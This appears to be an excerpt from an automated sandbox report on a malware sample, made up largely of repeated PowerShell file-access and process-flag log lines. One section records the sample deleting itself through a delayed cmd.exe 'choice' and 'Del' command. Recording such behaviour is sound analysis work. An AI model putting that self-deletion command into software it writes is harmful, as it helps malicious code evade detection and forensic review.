Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
